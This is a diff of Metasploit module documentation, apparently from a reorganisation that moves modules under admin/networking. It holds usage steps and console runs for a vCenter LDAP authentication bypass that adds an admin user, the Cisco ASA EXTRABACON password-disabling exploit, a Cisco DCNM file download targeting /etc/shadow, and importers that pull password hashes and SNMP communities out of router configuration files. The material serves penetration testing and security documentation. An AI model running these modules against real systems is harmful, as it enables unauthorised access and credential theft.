-msf5 auxiliary(admin/juniper/gather/juniper_config) > set config /tmp/screenos.conf
-config => /tmp/screenos.conf
-msf5 auxiliary(admin/juniper/gather/juniper_config) > set rhost 127.0.0.1
-rhost => 127.0.0.1
-msf5 auxiliary(admin/juniper/gather/juniper_config) > set action SCREENOS
-action => SCREENOS
-msf5 auxiliary(admin/juniper/gather/juniper_config) > run
-[*] Running module against 127.0.0.1
-
-[*] Importing config
-[+] Admin user netscreen found with password hash nKVUM2rwMUzPcrkG5sWIHdCtqkAibn
-[+] User 1 named testuser found with password hash auth. Enable permission: 02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=
-[+] Config import successful
-[*] Auxiliary module execution completed
-```
-
@@ -4,7 +4,8 @@

 This module bypasses LDAP authentication in VMware vCenter Server's
 vmdir service to add an arbitrary administrator user. Version 6.7
-prior to the 6.7U3f update is vulnerable.
+prior to the 6.7U3f update is vulnerable, only if upgraded from a
+previous release line, such as 6.0 or 6.5.

 ### Setup

@@ -35,11 +36,6 @@ Set this to the username for the new admin user.

 Set this to the password for the new admin user.

-### ConnectTimeout
-
-You may configure the timeout for LDAP connects if necessary. The
-default is 10.0 seconds and should be more than sufficient.
-
 ## Scenarios

 ### VMware vCenter Server 6.7 virtual appliance on ESXi
@@ -55,7 +51,8 @@ Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):
   BASE_DN                    no        LDAP base DN if you already have it
   PASSWORD                   no        Password of admin user to add
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT     389              yes       The target port
+   RPORT     636              yes       The target port
+   SSL       true             no        Enable SSL on the LDAP connection
   USERNAME                   no        Username of admin user to add


@@ -74,6 +71,7 @@ msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set password msfad
 password => msfadmin
 msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > run
 [*] Running module against [redacted]
+not verifying SSL hostname of LDAPS server '[redacted]:636'

 [*] Using auxiliary/gather/vmware_vcenter_vmdir_ldap as check
 [*] Discovering base DN automatically
@@ -89,19 +87,11 @@ supportedldapversion: 3
 supportedsaslmechanisms: GSSAPI

 [+] Discovered base DN: dc=vsphere,dc=local
-[*] Dumping LDAP data from vmdir service at [redacted]:389
-[+] [redacted]:389 is vulnerable to CVE-2020-3952
+[*] Dumping LDAP data from vmdir service at [redacted]:636
+[+] [redacted]:636 is vulnerable to CVE-2020-3952
 [*] Storing LDAP data in loot
 [+] Saved LDAP data to /Users/wvu/.msf4/loot/20200417002255_default_[redacted]_VMwarevCenterS_975097.txt
 [*] Password and lockout policy:
-dn: cn=password and lockout policy,dc=vsphere,dc=local
-cn: password and lockout policy
-enabled: TRUE
-ntsecuritydescriptor:: [redacted]
-objectclass: top
-objectclass: vmwLockoutPolicy
-objectclass: vmwPasswordPolicy
-objectclass: vmwPolicy
 vmwpasswordchangeautounlockintervalsec: [redacted]
 vmwpasswordchangefailedattemptintervalsec: [redacted]
 vmwpasswordchangemaxfailedattempts: [redacted]
@@ -116,7 +106,9 @@ vmwpasswordminspecialcharcount: [redacted]
 vmwpasswordminuppercasecount: [redacted]
 vmwpasswordprohibitedpreviouscount: [redacted]

-[*] Bypassing LDAP auth in vmdir service at [redacted]:389
+[+] Credentials found: [redacted]
+[snip]
+[*] Bypassing LDAP auth in vmdir service at [redacted]:636
 [*] Adding admin user msfadmin with password msfadmin
 [+] Added user msfadmin, so auth bypass was successful!
 [+] Added user msfadmin to admin group
@@ -0,0 +1,108 @@
+## Vulnerable Application
+
+### General Notes
+
+This module imports an Arista configuration file into the database.
+This is similar to `post/networking/gather/enum_arista` only access isn't required,
+and assumes you already have the file.
+
+Arista vEOS is available to download for [GNS3](https://www.gns3.com/marketplace/featured/arista-veos)
+
+Example config file:
+
+```
+! Command: show running-config
+! device: aristaveos (vEOS, EOS-4.19.10M)
+!
+! boot system flash:vEOS-lab.swi
+!
+transceiver qsfp default-mode 4x10G
+!
+hostname aristaveos
+!
+snmp-server community read ro
+snmp-server community write rw
+!
+spanning-tree mode mstp
+!
+enable secret sha512 $6$jemN09cUdoLRim6i$Mvl2Fog/VZ7ktxyLSVDR1KnTTTPSMHU3WD.G/kxwgODdsc3d7S1aSNJX/DJmQI3nyrYnEw4lsmoKPGClFJ9hH1
+aaa root secret sha512 $6$Rnanb2dQsVy2H3QL$DEYDZMy6j6KK4XK62Uh.3U3WXxK5XJvn8Zd5sm36T7BVKHS5EmIcQV.EN1X1P1ZO099S0lkxpvEGzA9yK5PQF.
+!
+username admin privilege 15 role network-admin secret sha512 $6$Ei2bjrcTCGPOjSkk$7S.XSTZqdRVXILbUUDcRPCxzyfqEFYzg6HfL0BHXvriETX330MT.KObHLkGx7n9XZRVWBr68ZsKfvzvxYCvj61
+!
+interface Ethernet1
+!
+interface Ethernet2
+!
+interface Ethernet3
+!
+interface Ethernet4
+!
+interface Ethernet5
+!
+interface Ethernet6
+!
+interface Ethernet7
+!
+interface Ethernet8
+!
+interface Ethernet9
+!
+interface Ethernet10
+!
+interface Ethernet11
+!
+interface Ethernet12
+!
+interface Management1
+   ip address dhcp
+!
+no ip routing
+!
+end
+```
+
+## Verification Steps
+
+1. Have a Arista configuration file
+2. Start `msfconsole`
+3. `use auxiliary/admin/networking/arista_config`
+4. `set RHOST x.x.x.x`
+5. `set CONFIG /tmp/file.config`
+6. `run`
+
+## Options
+
+### RHOST
+
+Needed for setting services and items to.  This is relatively arbitrary.
+
+### CONFIG
+
+File path to the configuration file.
+
+## Scenarios
+
+```
+resource (arista_config.rb)> use auxiliary/admin/networking/arista_config
+resource (arista_config.rb)> set rhost 1.1.1.1
+rhost => 1.1.1.1
+resource (arista_config.rb)> set config /tmp/veos.config
+config => /tmp/veos.config
+resource (arista_config.rb)> set verbose true
+verbose => true
+resource (arista_config.rb)> run
+[*] Running module against 1.1.1.1
+[*] Importing config
+[+] 1.1.1.1:22 Hostname: aristaveos, Device: vEOS, OS: EOS, Version: 4.19.10M
+[+] 1.1.1.1:22 Hostname: aristaveos
+[+] 1.1.1.1:22 SNMP Community (ro): read
+[+] 1.1.1.1:22 SNMP Community (rw): write
+[+] 1.1.1.1:22 Enable hash: $6$jemN09cUdoLRim6i$Mvl2Fog/VZ7ktxyLSVDR1KnTTTPSMHU3WD.G/kxwgODdsc3d7S1aSNJX/DJmQI3nyrYnEw4lsmoKPGClFJ9hH1
+[+] 1.1.1.1:22 AAA Username 'root' with Hash: $6$Rnanb2dQsVy2H3QL$DEYDZMy6j6KK4XK62Uh.3U3WXxK5XJvn8Zd5sm36T7BVKHS5EmIcQV.EN1X1P1ZO099S0lkxpvEGzA9yK5PQF.
+[+] 1.1.1.1:22 Username 'admin' with privilege 15, Role network-admin, and Hash: $6$Ei2bjrcTCGPOjSkk$7S.XSTZqdRVXILbUUDcRPCxzyfqEFYzg6HfL0BHXvriETX330MT.KObHLkGx7n9XZRVWBr68ZsKfvzvxYCvj61
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
+
+
@@ -0,0 +1,172 @@
+## Vulnerable Application
+
+### General Notes
+
+This module imports a Brocade configuration file into the database.
+This is similar to `post/networking/gather/enum_brocade` only access isn't required,
+and assumes you already have the file.
+
+### Example Config
+
+Example files for import can be found on git, like
+[this](https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/brocade_08.0.30hT311_ic_icx6430.conf).
+
+```
+!
+Startup-config data location is flash memory
+!
+Startup configuration:
+!
+ver 08.0.20T311
+!
+stack unit 1
+  module 1 icx6430-24-port-management-module
+  module 2 icx6430-sfp-4port-4g-module
+!
+!
+!
+!
+!
+!
+!
+!
+aaa authentication web-server default local
+aaa authentication login default local
+enable password-display
+enable super-user-password 8 $1$QP3H93Wm$uxYAs2HmAK0lQiP3ig5tm.
+ip address 2.2.2.2 255.255.255.0 dynamic
+ip dns server-address 1.1.1.1
+ip default-gateway 1.1.1.1
+!
+username brocade password 8 $1$f/uxhovU$dST5lNskZCPQe/5QijULi0
+username test password 8 $1$qKOcZizM$ySW1EyiUpKSHw9MT4PZ11.
+snmp-server community 2 $MlVzZCFAbg== ro
+snmp-server community 2 $U2kyXj1k rw
+!
+!
+interface ethernet 1/1/1
+ speed-duplex 1000-full-master
+!
+interface ethernet 1/1/2
+ speed-duplex 1000-full-master
+!
+interface ethernet 1/1/3
+ speed-duplex 1000-full-master
+!
+interface ethernet 1/1/4
+ speed-duplex 1000-full-master
+!
+interface ethernet 1/1/5
+ speed-duplex 1000-full-master
+!
+interface ethernet 1/1/6
+ speed-duplex 1000-full-master
+!
+interface ethernet 1/1/7
+ speed-duplex 1000-full-master
+!
+interface ethernet 1/1/8
+ speed-duplex 1000-full-master
+!
+interface ethernet 1/1/9
+ speed-duplex 1000-full-master
+!
+interface ethernet 1/1/10
+ speed-duplex 1000-full-master
+!
+interface ethernet 1/1/11
+ speed-duplex 1000-full-master
+!
+interface ethernet 1/1/12
+ speed-duplex 1000-full-master
+!
+interface ethernet 1/1/13
+ speed-duplex 1000-full-master
+!
+interface ethernet 1/1/14
+ speed-duplex 1000-full-master
+!
+interface ethernet 1/1/15
+ speed-duplex 1000-full-master
+!
+interface ethernet 1/1/16
+ speed-duplex 1000-full-master
+!
+interface ethernet 1/1/17
+ speed-duplex 1000-full-master
+!
+interface ethernet 1/1/18
+ speed-duplex 1000-full-master
+!
+interface ethernet 1/1/19
+ speed-duplex 1000-full-master
+!
+interface ethernet 1/1/20
+ speed-duplex 1000-full-master
+!
+interface ethernet 1/1/21
+ speed-duplex 1000-full-master
+!
+interface ethernet 1/1/22
+ speed-duplex 1000-full-master
+!
+interface ethernet 1/1/23
+ speed-duplex 1000-full-master
+ no spanning-tree
+!
+interface ethernet 1/1/24
+ speed-duplex 1000-full-master
+ no spanning-tree
+!
+!
+!
+!
+!
+!
+!
+!
+end
+```
+
+## Verification Steps
+
+1. Have a Brocade configuration file
+2. Start `msfconsole`
+3. `use auxiliary/admin/networking/brocade_config`
+4. `set RHOST x.x.x.x`
+5. `set CONFIG /tmp/file.config`
+6. `run`
+
+## Options
+
+### RHOST
+
+Needed for setting services and items to.  This is relatively arbitrary.
+
+### CONFIG
+
+File path to the configuration file.
+
+## Scenarios
+
+```
+msf5 > wget https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/brocade_08.0.30hT311_ic_icx6430.conf -o /dev/null -O /tmp/brocade.conf
+msf5 > use auxiliary/admin/networking/brocade_config
+msf5 auxiliary(admin/networking/brocade_config) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 auxiliary(admin/networking/brocade_config) > set config /tmp/brocade.conf
+config => /tmp/brocade.conf
+msf5 auxiliary(admin/networking/brocade_config) > run
+[*] Running module against 127.0.0.1
+
+[*] Importing config
+[+] password-display is enabled, hashes will be displayed in config
+[+] enable password hash $1$QP3H93Wm$uxYAs2HmAK0lQiP3ig5tm.
+[+] User brocade of type 8 found with password hash $1$f/uxhovU$dST5lNskZCPQe/5QijULi0.
+[+] ENCRYPTED SNMP community $MlVzZCFAbg== with permissions ro
+[+] ENCRYPTED SNMP community $U2kyXj1k with permissions rw
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
+
+
@@ -1,4 +1,6 @@
-## General notes
+## Vulnerable Application
+
+### General notes

 This is using improved shellcode, has less stages than the Equation Group
 version making it more reliable. This makes the SNMP payload packet ~150 less
@@ -10,7 +12,7 @@ finder are available at:

 https://github.com/RiskSense-Ops/CVE-2016-6366

-## Partial list of supported versions
+### Partial list of supported versions
 ------------------------------------------------------------
 All of the leaked versions are available in the module

@@ -54,12 +56,14 @@ All of the leaked versions are available in the module

 `*` new version support not part of the original Shadow Brokers leak

-`**` We currently can't distinguish between normal and NPE versions from the SNMP strings. We've commented out the NPE offsets, as NPE is very rare (it is for exporting to places where encryption is crappy), but in the future, we'd like to incorporate these versions. Perhaps as a bool option?
+`**` We currently can't distinguish between normal and NPE versions from the SNMP strings. We've commented out the
+NPE offsets, as NPE is very rare (it is for exporting to places where encryption is crappy), but in the future,
+we'd like to incorporate these versions. Perhaps as a bool option?

 ## Verification Steps

 - Start `msfconsole`
- `use auxiliary/admin/cisco/cisco_asa_extrabacon`
+- `use auxiliary/admin/networking/cisco_asa_extrabacon`
 - `set RHOST x.x.x.x`
 - `check`
 - `run`
@@ -68,10 +72,14 @@ All of the leaked versions are available in the module
 - `run`
 - ssh admin@x.x.x.x, ensure fake password does not work

-## Checking for a vulnerable version
+## Options
+
+## Scenarios
+
+### Checking for a vulnerable version

 ```
-msf > use auxiliary/admin/cisco/cisco_asa_extrabacon
+msf > use auxiliary/admin/networking/cisco_asa_extrabacon
 msf auxiliary(cisco_asa_extrabacon) > set rhost 192.168.1.1
 rhost => 192.168.1.1
 msf auxiliary(cisco_asa_extrabacon) > check
@@ -80,7 +88,7 @@ msf auxiliary(cisco_asa_extrabacon) > check
 [*] 192.168.1.1:161 The target appears to be vulnerable.
 ```

-## Disabling administrative password
+### Disabling administrative password

 ```
  msf auxiliary(cisco_asa_extrabacon) > set
@@ -101,7 +109,7 @@ msf auxiliary(cisco_asa_extrabacon) > run
 [*] Auxiliary module execution completed
 ```

-## Re-enabling administrative password
+### Re-enabling administrative password

 ```
 msf auxiliary(cisco_asa_extrabacon) > set MODE pass-enable
@@ -1,30 +1,33 @@
-## General Notes
+## Vulnerable Application
+
+### General Notes

 This module imports a Cisco configuration file into the database.
-This is similar to `post/cisco/gather/enum_cisco` only access isn't required,
+This is similar to `post/networking/gather/enum_cisco` only access isn't required,
 and assumes you already have the file.

-Example files for import can be found on git, like [this](https://raw.githubusercontent.com/GaetanLongree/MASI-ProjetAvanceReseau/3cf1d9a93828d5f44ee1bc4e4c01411e416892c5/Los%20Angeles/LA_EDGE_D.txt)
+Example files for import can be found on git, like
+[this](https://raw.githubusercontent.com/GaetanLongree/MASI-ProjetAvanceReseau/3cf1d9a93828d5f44ee1bc4e4c01411e416892c5/Los%20Angeles/LA_EDGE_D.txt)
 or from [Cisco](https://www.cisco.com/en/US/docs/routers/access/800/850/software/configuration/guide/sampconf.html).

 ## Verification Steps

 1. Have a Cisco configuration file
 2. Start `msfconsole`
-3. `use auxiliary/admin/cisco/cisco_config`
+3. `use auxiliary/admin/networking/cisco_config`
 4. `set RHOST x.x.x.x`
 5. `set CONFIG /tmp/file.config`
 6. `run`

 ## Options

-  **RHOST**
+### RHOST

-  Needed for setting services and items to.  This is relatively arbitrary.
+Needed for setting services and items to.  This is relatively arbitrary.

-  **CONFIG**
+### CONFIG

-  File path to the configuration file.
+File path to the configuration file.

 ## Scenarios

@@ -34,12 +37,12 @@ root@metasploit-dev:~/metasploit-framework# wget https://raw.githubusercontent.c
 root@metasploit-dev:~/metasploit-framework# ./msfconsole 

 [*] Starting persistent handler(s)...
-msf5 > use auxiliary/admin/cisco/cisco_config 
-msf5 auxiliary(admin/cisco/cisco_config) > set config /tmp/LA_EDGE_D.txt
+msf5 > use auxiliary/admin/networking/cisco_config 
+msf5 auxiliary(admin/networking/cisco_config) > set config /tmp/LA_EDGE_D.txt
 config => /tmp/LA_EDGE_D.txt
-msf5 auxiliary(admin/cisco/cisco_config) > set rhost 127.0.0.1
+msf5 auxiliary(admin/networking/cisco_config) > set rhost 127.0.0.1
 rhost => 127.0.0.1
-msf5 auxiliary(admin/cisco/cisco_config) > run
+msf5 auxiliary(admin/networking/cisco_config) > run
 [*] Running module against 127.0.0.1

 [*] Importing config
@@ -1,6 +1,6 @@
 ## Vulnerable Application

-Cisco Data Center Network Manager exposes a servlet to download files on /fm/downloadServlet.
+Cisco Data Center Network Manager exposes a servlet to download files on `/fm/downloadServlet`.
 An authenticated user can abuse this servlet to download arbitrary files as root by specifying
 the full path of the file (aka CVE-2019-1621).

@@ -8,16 +8,24 @@ This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and
 work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
 (see References to understand why), on the other versions it abuses CVE-2019-1619 to bypass authentication.

+## Verification Steps
+
+1. Do: ```use auxiliary/admin/networking/cisco_dcnm_download```
+2. Do: ```set rhosts [ip]```
+3. Do: ```run```
+
+## Options
+
 ## Scenarios

 Setup RHOST, pick the file to download (FILENAME, default is /etc/shadow) and enjoy!

 ```
-msf5 exploit(multi/http/cisco_dcnm_upload_2019) > use auxiliary/admin/cisco/cisco_dcnm_download
+msf5 exploit > use auxiliary/admin/networking/cisco_dcnm_download

-msf5 auxiliary(admin/cisco/cisco_dcnm_download) > set rhost 10.75.1.40
+msf5 auxiliary(admin/networking/cisco_dcnm_download) > set rhost 10.75.1.40
 rhost => 10.75.1.40
-msf5 auxiliary(admin/cisco/cisco_dcnm_download) > run
+msf5 auxiliary(admin/networking/cisco_dcnm_download) > run

 [+] 10.75.1.40:443 - Detected DCNM 10.4(2)
 [*] 10.75.1.40:443 - No authentication required, ready to exploit!
@@ -0,0 +1,525 @@
+## Vulnerable Application
+
+### General Notes
+
+This module imports an F5 configuration file into the database.
+This is similar to `post/networking/gather/enum_f5` only access isn't required,
+and assumes you already have the file.
+
+### Example Config
+
+```
+#TMSH-VERSION: 15.1.0.2
+
+cm cert /Common/dtca-bundle.crt {
+    cache-path /config/filestore/files_d/Common_d/trust_certificate_d/:Common:dtca-bundle.crt_62970_3
+    checksum SHA1:1310:d1e052507e0ec1a274848374ff904ae8548d7dd2
+    revision 3
+}
+cm cert /Common/dtca.crt {
+    cache-path /config/filestore/files_d/Common_d/trust_certificate_d/:Common:dtca.crt_62966_3
+    checksum SHA1:1310:d1e052507e0ec1a274848374ff904ae8548d7dd2
+    revision 3
+}
+cm cert /Common/dtdi.crt {
+    cache-path /config/filestore/files_d/Common_d/trust_certificate_d/:Common:dtdi.crt_62962_3
+    checksum SHA1:1285:0f4ddae3808474c70911f43725c7cfdb46aa4430
+    revision 3
+}
+cm device /Common/f5bigip.home.com {
+    active-modules { "BIG-IP, VE Trial|VTFLRXF-LFSIQYY|Rate Shaping|External Interface and Network HSM, VE|SDN Services, VE|SSL, Forward Proxy, VE|BIG-IP VE, Multicast Routing|APM, Limited|SSL, VE|DNS (1K QPS), VE|Routing Bundle, VE|ASM, VE|Crytpo Offload, VE, Tier 1 (25M - 200M)|Max Compression, VE|AFM, VE|DNSSEC|Anti-Virus Checks|Base Endpoint Security Checks|Firewall Checks|Network Access|Secure Virtual Keyboard|APM, Web Application|Machine Certificate Checks|Protected Workspace|Remote Desktop|App Tunnel|VE, Carrier Grade NAT (AFM ONLY)|PSM, VE" }
+    base-mac aa:aa:aa:aa:aa:aa
+    build 0.0.9
+    cert /Common/dtdi.crt
+    chassis-id 564dcf79-53ce-3494-3217671849c7
+    configsync-ip 10.10.10.222
+    edition "Point Release 2"
+    hostname f5bigip.home.com
+    key /Common/dtdi.key
+    management-ip 2.2.2.2
+    marketing-name "BIG-IP Virtual Edition"
+    platform-id Z100
+    product BIG-IP
+    self-device true
+    time-zone America/Los_Angeles
+    version 15.1.0.2
+}
+cm device-group /Common/device_trust_group {
+    auto-sync enabled
+    devices {
+        /Common/f5bigip.home.com { }
+    }
+    hidden true
+    network-failover disabled
+}
+cm device-group /Common/gtm {
+    devices {
+        /Common/f5bigip.home.com { }
+    }
+    hidden true
+    network-failover disabled
+}
+cm key /Common/dtca.key {
+    cache-path /config/filestore/files_d/Common_d/trust_certificate_key_d/:Common:dtca.key_62968_3
+    checksum SHA1:1704:f274958ad619b0c70d8ccc4f7c5ae199061464e6
+    revision 3
+}
+cm key /Common/dtdi.key {
+    cache-path /config/filestore/files_d/Common_d/trust_certificate_key_d/:Common:dtdi.key_62964_3
+    checksum SHA1:1704:97eeb5aedee76b3c21e6d735604a092e830ef6c2
+    revision 3
+}
+cm traffic-group /Common/traffic-group-1 {
+    unit-id 1
+}
+cm traffic-group /Common/traffic-group-local-only { }
+cm trust-domain /Common/Root {
+    ca-cert /Common/dtca.crt
+    ca-cert-bundle /Common/dtca-bundle.crt
+    ca-devices { /Common/f5bigip.home.com }
+    ca-key /Common/dtca.key
+    guid fe0ee274-0355-4940-acc7000c291849c7
+    status standalone
+    trust-group /Common/device_trust_group
+}
+net interface 1.1 {
+    media-fixed 10000T-FD
+}
+net interface 1.2 {
+    media-fixed 10000T-FD
+}
+net interface 1.3 {
+    media-fixed 10000T-FD
+}
+net port-list /Common/_sys_self_allow_tcp_defaults {
+    ports {
+        22 { }
+        53 { }
+        161 { }
+        443 { }
+        1029-1043 { }
+        4353 { }
+    }
+}
+net port-list /Common/_sys_self_allow_udp_defaults {
+    ports {
+        53 { }
+        161 { }
+        520 { }
+        1026 { }
+        4353 { }
+    }
+}
+net route-domain /Common/0 {
+    id 0
+    vlans {
+        /Common/http-tunnel
+        /Common/socks-tunnel
+        /Common/internal
+    }
+}
+net self /Common/10.10.10.223 {
+    address 10.10.10.223/8
+    allow-service {
+        default
+    }
+    traffic-group /Common/traffic-group-1
+    vlan /Common/internal
+}
+net self /Common/10.10.10.222 {
+    address 10.10.10.222/8
+    allow-service {
+        default
+    }
+    traffic-group /Common/traffic-group-local-only
+    vlan /Common/internal
+}
+net self-allow {
+    defaults {
+        igmp:0
+        ospf:0
+        pim:0
+        tcp:161
+        tcp:22
+        tcp:4353
+        tcp:443
+        tcp:53
+        udp:1026
+        udp:161
+        udp:4353
+        udp:520
+        udp:53
+    }
+}
+net stp /Common/cist { }
+net vlan /Common/internal {
+    tag 4094
+}
+net fdb tunnel /Common/http-tunnel { }
+net fdb tunnel /Common/socks-tunnel { }
+net fdb vlan /Common/internal { }
+net tunnels tunnel /Common/http-tunnel {
+    description "Tunnel for http-explicit profile"
+    profile /Common/tcp-forward
+}
+net tunnels tunnel /Common/socks-tunnel {
+    description "Tunnel for socks profile"
+    profile /Common/tcp-forward
+}
+security device-id attribute /Common/att01 {
+    id 1
+}
+security device-id attribute /Common/att02 {
+    id 2
+}
+security device-id attribute /Common/att03 {
+    id 3
+}
+security device-id attribute /Common/att04 {
+    id 4
+}
+security device-id attribute /Common/att05 {
+    id 5
+}
+security device-id attribute /Common/att06 {
+    id 6
+}
+security device-id attribute /Common/att07 {
+    id 7
+}
+security device-id attribute /Common/att08 {
+    id 8
+}
+security device-id attribute /Common/att09 {
+    id 9
+}
+security device-id attribute /Common/att10 {
+    id 10
+}
+security device-id attribute /Common/att11 {
+    id 11
+}
+security device-id attribute /Common/att12 {
+    id 12
+}
+security device-id attribute /Common/att13 {
+    id 13
+}
+security device-id attribute /Common/att14 {
+    id 14
+}
+security device-id attribute /Common/att15 {
+    id 15
+}
+security device-id attribute /Common/att16 {
+    id 16
+}
+security device-id attribute /Common/att17 {
+    id 17
+}
+security device-id attribute /Common/att18 {
+    id 18
+}
+security device-id attribute /Common/att19 {
+    id 19
+}
+security device-id attribute /Common/att20 {
+    id 20
+}
+security device-id attribute /Common/att21 {
+    id 21
+}
+security device-id attribute /Common/att22 {
+    id 22
+}
+security device-id attribute /Common/att23 {
+    id 23
+}
+security device-id attribute /Common/att24 {
+    id 24
+}
+security device-id attribute /Common/att25 {
+    id 25
+}
+security device-id attribute /Common/att26 {
+    id 26
+}
+security device-id attribute /Common/att27 {
+    id 27
+}
+security device-id attribute /Common/att28 {
+    id 28
+}
+security device-id attribute /Common/att29 {
+    id 29
+}
+security device-id attribute /Common/att30 {
+    id 30
+}
+security device-id attribute /Common/att31 {
+    id 31
+}
+security device-id attribute /Common/att32 {
+    id 32
+}
+security device-id attribute /Common/att33 {
+    id 33
+}
+security device-id attribute /Common/att34 {
+    id 34
+}
+security device-id attribute /Common/att35 {
+    id 35
+}
+security device-id attribute /Common/att36 {
+    id 36
+}
+security device-id attribute /Common/att37 {
+    id 37
+}
+security device-id attribute /Common/att38 {
+    id 38
+}
+security device-id attribute /Common/att39 {
+    id 39
+}
+security firewall config-entity-id /Common/uuid_entity_id {
+    entity-id 3346813779321352940
+}
+security firewall port-list /Common/_sys_self_allow_tcp_defaults {
+    ports {
+        22 { }
+        53 { }
+        161 { }
+        443 { }
+        1029-1043 { }
+        4353 { }
+    }
+}
+security firewall port-list /Common/_sys_self_allow_udp_defaults {
+    ports {
+        53 { }
+        161 { }
+        520 { }
+        1026 { }
+        4353 { }
+    }
+}
+security firewall rule-list /Common/_sys_self_allow_all {
+    rules {
+        _sys_allow_all {
+            action accept
+            ip-protocol any
+        }
+    }
+}
+security firewall rule-list /Common/_sys_self_allow_defaults {
+    rules {
+        _sys_allow_tcp_defaults {
+            action accept
+            ip-protocol tcp
+            destination {
+                port-lists {
+                    /Common/_sys_self_allow_tcp_defaults
+                }
+            }
+        }
+        _sys_allow_udp_defaults {
+            action accept
+            ip-protocol udp
+            destination {
+                port-lists {
+                    /Common/_sys_self_allow_udp_defaults
+                }
+            }
+        }
+        _sys_allow_ospf_defaults {
+            action accept
+            ip-protocol ospf
+        }
+        _sys_allow_pim_defaults {
+            action accept
+            ip-protocol pim
+        }
+        _sys_allow_igmp_defaults {
+            action accept
+            ip-protocol igmp
+        }
+    }
+}
+security firewall rule-list /Common/_sys_self_allow_management {
+    rules {
+        _sys_allow_ssh {
+            action accept
+            ip-protocol tcp
+            destination {
+                ports {
+                    22 { }
+                }
+            }
+        }
+        _sys_allow_web {
+            action accept
+            ip-protocol tcp
+            destination {
+                ports {
+                    443 { }
+                }
+            }
+        }
+    }
+}
+security ip-intelligence policy /Common/ip-intelligence { }
+security shared-objects port-list /Common/_sys_self_allow_tcp_defaults {
+    ports {
+        22 { }
+        53 { }
+        161 { }
+        443 { }
+        1029-1043 { }
+        4353 { }
+    }
+}
+security shared-objects port-list /Common/_sys_self_allow_udp_defaults {
+    ports {
+        53 { }
+        161 { }
+        520 { }
+        1026 { }
+        4353 { }
+    }
+}
+sys dns {
+    description configured-by-dhcp
+    name-servers { 192.168.2.40 9.9.9.9 }
+    search { ragedomain }
+}
+sys folder / {
+    device-group none
+    hidden false
+    inherited-devicegroup false
+    inherited-traffic-group false
+    traffic-group /Common/traffic-group-1
+}
+sys folder /Common {
+    device-group none
+    hidden false
+    inherited-devicegroup true
+    inherited-traffic-group true
+    traffic-group /Common/traffic-group-1
+}
+sys folder /Common/Drafts {
+    device-group none
+    hidden false
+    inherited-devicegroup true
+    inherited-traffic-group true
+    traffic-group /Common/traffic-group-1
+}
+sys global-settings {
+    hostname f5bigip.home.com
+}
+sys management-dhcp /Common/sys-mgmt-dhcp-config {
+    request-options { subnet-mask broadcast-address routers domain-name domain-name-servers host-name ntp-servers interface-mtu }
+}
+sys provision ltm {
+    level nominal
+}
+sys snmp {
+    agent-addresses { tcp6:161 udp6:161 }
+    communities {
+        /Common/comm-public {
+            community-name public
+            source default
+        }
+    }
+    disk-monitors {
+        /Common/root {
+            minspace 2000
+            path /
+        }
+        /Common/var {
+            minspace 10000
+            path /var
+        }
+    }
+    process-monitors {
+        /Common/bigd {
+            max-processes infinity
+            process bigd
+        }
+        /Common/chmand {
+            process chmand
+        }
+        /Common/httpd {
+            max-processes infinity
+            process httpd
+        }
+        /Common/mcpd {
+            process mcpd
+        }
+        /Common/sod {
+            process sod
+        }
+        /Common/tmm {
+            max-processes infinity
+            process tmm
+        }
+    }
+}
+sys dynad settings {
+    development-mode false
+}
+sys fpga firmware-config {
+    type standard-balanced-fpga
+}
+sys sflow global-settings http { }
+sys sflow global-settings vlan { }
+sys turboflex profile-config {
+    type turboflex-adc
+}
+```
+
+## Verification Steps
+
+1. Have an F5 configuration file
+2. Start `msfconsole`
+3. `use auxiliary/admin/networking/f5_config`
+4. `set RHOST x.x.x.x`
+5. `set CONFIG /tmp/file.config`
+6. `run`
+
+## Options
+
+### RHOST
+
+Needed for setting services and items to.  This is relatively arbitrary.
+
+### CONFIG
+
+File path to the configuration file.
+
+## Scenarios
+
+### F5 Big-IP 15.1.0.2 (virtual on ESXi)
+
+```
+resource (f5.rb)> use auxiliary/admin/networking/f5_config
+resource (f5.rb)> set config /home/h00die/Downloads/f5_config.txt
+config => /home/h00die/Downloads/f5_config.txt
+resource (f5.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+resource (f5.rb)> set verbose true
+verbose => true
+resource (f5.rb)> run
+[*] Running module against 127.0.0.1
+[*] Importing config
+[+] 127.0.0.1:22 SNMP Community 'public' with RO access
+[+] 127.0.0.1:22 Hostname: f5bigip.home.com
+[+] 127.0.0.1:22 MAC Address: aa:aa:aa:aa:aa:aa
+[+] 127.0.0.1:22 Management IP: 2.2.2.2
+[+] 127.0.0.1:22 Product BIG-IP
+[+] 127.0.0.1:22 OS Version: 15.1.0.2
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
+
@@ -0,0 +1,1087 @@
+## Vulnerable Application
+
+### General Notes
+
+This module imports a Juniper configuration file into the database.
+This is similar to `post/networking/gather/enum_juniper` only access isn't required,
+and assumes you already have the file.
+
+### Example Configs
+
+#### JunOS
+
+[JunOS](https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/juniper_ex2200.config)
+
+```
+## Last commit: 2016-08-15 13:35:48 UTC by root
+version 12.3R7.7;
+system {
+    host-name h00dieJuniperEx2200;
+    root-authentication {
+        encrypted-password "$1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E."; ## SECRET-DATA
+    }
+    login {
+        user newuser {
+            uid 2000;
+            class super-user;
+            authentication {
+                encrypted-password "$1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/"; ## SECRET-DATA
+            }
+        }
+        user newuser2 {
+            uid 2002;
+            class operator;
+            authentication {
+                encrypted-password "$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0"; ## SECRET-DATA
+            }
+        }
+        user newuser3 {
+            uid 2003;
+            class read-only;
+            authentication {
